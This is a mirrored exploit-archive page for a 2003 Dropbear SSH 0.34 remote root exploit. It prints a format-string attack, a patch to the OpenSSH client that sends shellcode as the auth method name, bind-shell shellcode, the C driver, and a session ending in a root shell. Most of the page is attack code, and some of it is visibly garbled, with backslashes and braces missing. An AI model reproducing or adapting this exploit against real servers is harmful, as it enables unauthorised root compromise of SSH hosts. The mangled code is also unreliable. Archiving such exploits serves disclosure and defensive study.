Dropbear SSH 0.34 – Remote Code Execution

Dropbear SSH 0.34 – Remote Code Execution

漏洞ID 1054554 漏洞类型
发布时间 2004-08-09 更新时间 2004-08-09
图片[1]-Dropbear SSH 0.34 – Remote Code Execution-安全小百科CVE编号 N/A
图片[2]-Dropbear SSH 0.34 – Remote Code Execution-安全小百科CNNVD-ID N/A
漏洞平台 Linux CVSS评分 N/A
* Linux x86 Dropbear SSH <= 0.34 remote root exploit 
* coded by live 
* You'll need a hacked ssh client to try this out. I included a patch 
* to openssh-3.6.p1 somewhere below this comment. 
* The point is: the buffer being exploited is too small(25 bytes) to hold our 
* shellcode, so a workaround was needed in order to send it. What I did here 
* was to hack the ssh client so that it sends the local   environment variable 
* SHELLCODE as ssh's methodname string.   This method   was described by Joel 
* Eriksson @ 0xbadc0ded.org. 
* The 25 bytes limitation is also the reason for the the strange ``2 byte'' 
* retaddr you will see here. That's not enough for complete pointer overwrite, 
* so I decided to   overwrite 3rd and 2nd   bytes and hope our   shellcode is 
* around ;) 
* % telnet localhost 22 
* Trying 
* Connected to localhost. 
* Escape character is '^]'. 
* SSH-2.0-dropbear_0.34 
* ^] 
* telnet> quit 
* Connection closed. 
* % objdump -R /usr/local/sbin/dropbear| grep malloc 
* 080673bc R_386_JUMP_SLOT   malloc 
* % drop-root -v24 localhost 
* ?.2022u%24$hn@localhost's password: 
* Connection closed by 
* % telnet localhost 10275 
* Trying 
* Connected to localhost. 
* Escape character is '^]'. 
* id; exit; 
* uid=0(root) gid=0(root) groups=0(root) 
* Connection closed by foreign host. 
* In the above example we were able to lookup a suitable .got entry(used as 
* retloc here), but this may not be true under a hostile environment. If 
* exploiting this remotely I feel like chances would be greater if we attack 
* the stack, but that's just a guess. 
* Version pad is 24 to 0.34, 12 to 0.32. I don't know about other versions. 
* gr33tz: ppro, alcaloide and friends. 
* 21.08.2003 
* Please do not distribute 


--- sshconnect2.c2003-08-21 21:34:03.000000000 -0300 
+++ sshconnect2.c.hack2003-08-21 21:33:47.000000000 -0300 
@@ -278,6 +278,8 @@ 
userauth(Authctxt *authctxt, char *authlist) 
+     char *shellcode = getenv("SHELLCODE"); 
if (authlist == NULL) { 
authlist = authctxt->authlist; 
} else { 
@@ -290,6 +292,7 @@ 
if (method == NULL) 
fatal("Permission denied (%s).", authlist); 
authctxt->method = method; 
+         authctxt->method->name = shellcode; 
if (method->userauth(authctxt) != 0) { 
debug2("we sent a %s packet, wait for reply", method->name); 


#include <stdio.h> 
#include <stdlib.h> 
#include <unistd.h> 
#include <string.h> 

#define SSH_PATH               "ssh" 
#define SSH_PORT               "22" 

#define DEFAULT_VERSION_PAD     24 
#define DEFAULT_RETLOC         0xbffff800 
#define DEFAULT_RETADDR         0x080e /* 2 byte retaddr, not enough space for a 
                                      * full overwrite. */ 

/* fork/bind shellcode by live 
* default port is 10275 
* I believe this can be futher optmized, but size is not 
* an issue here since we are sending the shellcode through 
* a ssh variable which is about 30k bytes long. 
char shellcode[] = 
    "x31xc0"                       /* xor     %eax,%eax               */ 
    "xb0x02"                       /* mov     $0x2,%al                 */ 
    "xcdx80"                       /* int     $0x80                   */ 
    "x85xc0"                       /* test   %eax,%eax               */ 
    "x75x54"                       /* jne     5e                       */ 
    "xebx50"                       /* jmp     5c                       */ 
    "x5e"                           /* pop     %esi                     */ 
    "x31xc0"                       /* xor     %eax,%eax               */ 
    "x31xdb"                       /* xor     %ebx,%ebx               */ 
    "x89x46x08"                   /* mov     %eax,0x8(%esi)           */ 
    "xb0x02"                       /* mov     $0x2,%al                 */ 
    "x89x06"                       /* mov     %eax,(%esi)             */ 
    "xfexc8"                       /* dec     %al                     */ 
    "x89x46x04"                   /* mov     %eax,0x4(%esi)           */ 
    "xb0x66"                       /* mov     $0x66,%al               */ 
    "xfexc3"                       /* inc     %bl                     */ 
    "x89xf1"                       /* mov     %esi,%ecx               */ 
    "xcdx80"                       /* int     $0x80                   */ 
    "x89x06"                       /* mov     %eax,(%esi)             */ 
    "x89x4ex04"                   /* mov     %ecx,0x4(%esi)           */ 
    "x80x46x04x0c"               /* addb   $0xc,0x4(%esi)           */ 
    "x31xc0"                       /* xor     %eax,%eax               */ 
    "xb0x10"                       /* mov     $0x10,%al               */ 
    "x89x46x08"                   /* mov     %eax,0x8(%esi)           */ 
    "xb0x02"                       /* mov     $0x2,%al                 */ 
    "x66x89x46x0c"               /* mov     %ax,0xc(%esi)           */ 
    "x66xb8x28x23"               /* mov     $0x2328,%ax             */ 
    "x89x46x0e"                   /* mov     %eax,0xe(%esi)           */ 
    "x31xc0"                       /* xor     %eax,%eax               */ 
    "x89x46x10"                   /* mov     %eax,0x10(%esi)         */ 
    "xb0x66"                       /* mov     $0x66,%al               */ 
    "xfexc3"                       /* inc     %bl                     */ 
    "xcdx80"                       /* int     $0x80                   */ 
    "xfexcb"                       /* dec     %bl                     */ 
    "x89x5ex04"                   /* mov     %ebx,0x4(%esi)           */ 
    "x31xc0"                       /* xor     %eax,%eax               */ 
    "xb0x66"                       /* mov     $0x66,%al               */ 
    "xb3x04"                       /* mov     $0x4,%bl                 */ 
    "xcdx80"                       /* int     $0x80                   */ 
    "xebx04"                       /* jmp     60                       */ 
    "xebx44"                       /* jmp     a2                       */ 
    "xebx3a"                       /* jmp     9a                       */ 
    "x31xc0"                       /* xor     %eax,%eax               */ 
    "x89x46x04"                   /* mov     %eax,0x4(%esi)           */ 
    "x89x46x08"                   /* mov     %eax,0x8(%esi)           */ 
    "xb0x66"                       /* mov     $0x66,%al               */ 
    "xfexc3"                       /* inc     %bl                     */ 
    "xcdx80"                       /* int     $0x80                   */ 
    "x31xc9"                       /* xor     %ecx,%ecx               */ 
    "x89xc3"                       /* mov     %eax,%ebx               */ 
    "x31xc0"                       /* xor     %eax,%eax               */ 
    "xb0x3f"                       /* mov     $0x3f,%al               */ 
    "xcdx80"                       /* int     $0x80                   */ 
    "xfexc1"                       /* inc     %cl                     */ 
    "x80xf9x03"                   /* cmp     $0x3,%cl                 */ 
    "x75xf3"                       /* jne     72                       */ 
    "x68x2fx2fx73x68"           /* push   $0x68732f2f             */ 
    "x68x2fx62x69x6e"           /* push   $0x6e69622f             */ 
    "x89xe3"                       /* mov     %esp,%ebx               */ 
    "x31xc0"                       /* xor     %eax,%eax               */ 
    "x88x43x08"                   /* mov     %al,0x8(%ebx)           */ 
    "x50"                           /* push   %eax                     */ 
    "x53"                           /* push   %ebx                     */ 
    "x89xe1"                       /* mov     %esp,%ecx               */ 
    "x89xe2"                       /* mov     %esp,%edx               */ 
    "xb0x0b"                       /* mov     $0xb,%al                 */ 
    "xcdx80"                       /* int     $0x80                   */ 
    "x31xc0"                       /* xor     %eax,%eax               */ 
    "x31xdb"                       /* xor     %ebx,%ebx               */ 
    "xfexc0"                       /* inc     %al                     */ 
    "xcdx80"                       /* int     $0x80                   */ 
    "xe8x65xffxffxff"           /* call   c <up>                   */ 

static void usage(const char *progname); 

main(int argc, char *argv[]) 
    char buffer[29500], fmt[26], *target; 
    long int retloc, retaddr; 
    int ch, version_pad; 

    retloc           = DEFAULT_RETLOC +1; 
    retaddr         = DEFAULT_RETADDR -40; 
    version_pad     = DEFAULT_VERSION_PAD; 

    while ( (ch = getopt(argc, argv, "l:r:v:")) != -1) { 
        switch (ch) { 
            case 'l': 
                retloc += atoi(optarg) *4; 
            case 'r': 
                retaddr += atoi(optarg) *4; 
            case 'v': 
                version_pad = atoi(optarg); 

    if (argc -optind != 1) { 

    argc -= optind; 
    argv += optind; 

    target = argv[0]; 
    memset(buffer, 0x90, 29500); 
    memcpy(buffer +29500 -strlen(shellcode), shellcode, strlen(shellcode)); 
    memcpy(buffer, "SHELLCODE=", 10); 

    snprintf(fmt, sizeof fmt, "%c%c%c%c%%.%du%%%d$hn", 
        (retloc & 0xff), 
        (retloc & 0xff00) >> 8, 
        (retloc & 0xff0000) >> 16, 
        (retloc & 0xff000000) >> 24, 

    execl(SSH_PATH, "ssh", "-l", fmt, "-p", SSH_PORT, target, NULL); 

static void 
usage(const char *progname) { 
    fprintf(stderr, "Linux x86 Dropbear SSH <= 0.34 remote root exploitn"); 
    fprintf(stderr, "coded by livenn"); 
    fprintf(stderr, "Usage: %s [-l <retloc offset>] [-r <retaddr offset>]" 
        " [-v <version pad>] <target>n", progname); 

// milw0rm.com [2004-08-09]

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